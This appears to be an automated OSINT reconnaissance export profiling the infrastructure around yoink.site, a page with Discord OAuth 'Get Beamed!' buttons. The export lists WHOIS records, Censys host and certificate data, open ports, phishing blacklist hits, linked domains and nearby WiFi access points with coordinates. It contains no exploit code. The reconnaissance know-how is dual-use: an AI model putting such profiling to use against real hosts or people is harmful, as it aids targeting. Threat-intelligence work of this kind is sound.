<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 120.48.229.35.bc.googleusercontent.com | 35.229.48.120 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0065paula.github.io | 185.199.111.153 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.152): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | NameCheap, Inc. | Domain Name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2022-06-08T05:38:27Z
Creation Date: 2022-06-03T05:37:56Z
Registry Expiry Date: 2026-06-03T05:37:56Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.222 | 104.196.30.220 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.209): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Linked URL - Internal | No | URLScan.io | 4 | 0 | 1 | 0 | None | https://kekw.battleb0t.xyz/jar | battleb0t.xyz |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.120 | 34.148.97.127 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Host": ["87.248.157.102:2091"], "Server": ["cPanel"], "Connection": ["close"], "Www_Authenticate": ["Basic realm=\"Restricted Area\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"]} | 87.248.157.102 |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-oo.github.io]
https://www.openphish.com/feed.txt | 0-oo.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Carmen (Net ID: 00:00:28:F1:95:B9) | 41.8781, -87.6298 |
| 2023-05-12 02:45:34 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, SC, United States, US | 34.74.170.74 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:60:35:51) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes256-gcm@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 
"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", 
"diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not 
Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": 
"cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": 
false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:8443 | 188.114.97.1 |
| 2023-05-12 02:44:12 | Web Technology | No | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Nginx | kekw.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Lichtensteiner (Net ID: 00:01:E3:57:D3:4C) | 50.1188, 8.6843 |
| 2023-05-12 02:54:51 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 34.74.170.74:80 | 34.74.170.74 |
| 2023-05-12 02:54:34 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c596497ac4b8134-ORD
Content-Encoding: gzip
| 104.21.71.14 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Superonline_WiFi_7320 (Net ID: 00:02:61:5C:85:FF) | 40.2024, 29.0398 |
| 2023-05-12 03:09:37 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 226.30.196.104.bc.googleusercontent.com | 104.196.30.226 |
| 2023-05-12 02:44:17 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": 